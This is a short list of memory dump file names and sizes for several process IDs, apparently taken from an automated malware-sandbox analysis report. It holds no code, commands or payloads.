memory/4492-193-0x0000000007830000-0x000000000783A000-memory.dmpFilesize
40KB
-
memory/4492-164-0x00000000064B0000-0x00000000064CE000-memory.dmpFilesize
120KB
-
memory/4492-206-0x0000000007B10000-0x0000000007B2A000-memory.dmpFilesize
104KB
-
memory/4492-162-0x0000000005D30000-0x0000000005D96000-memory.dmpFilesize
408KB
-
memory/4492-197-0x0000000007A50000-0x0000000007AE6000-memory.dmpFilesize
600KB
-
memory/4492-204-0x00000000051E0000-0x00000000051EE000-memory.dmpFilesize
56KB
-
memory/4492-158-0x0000000005590000-0x0000000005BB8000-memory.dmpFilesize
6.2MB
-
memory/4492-185-0x00000000700F0000-0x000000007013C000-memory.dmpFilesize
304KB
-
memory/4492-154-0x0000000004E60000-0x0000000004E96000-memory.dmpFilesize
216KB
-
memory/4492-187-0x0000000006A60000-0x0000000006A7E000-memory.dmpFilesize
120KB
-
memory/4496-177-0x0000029335030000-0x0000029335042000-memory.dmpFilesize
72KB
-
memory/4496-165-0x0000029332AC0000-0x0000029332F21000-memory.dmpFilesize
4.4MB
-
memory/4496-166-0x00007FFB0FB70000-0x00007FFB10631000-memory.dmpFilesize
10.8MB
-
memory/4540-130-0x0000000000400000-0x0000000001D56000-memory.dmpFilesize
25.3MB
-
memory/4800-202-0x0000000000000000-mapping.dmp
-
memory/5080-163-0x0000000000000000-mapping.dmp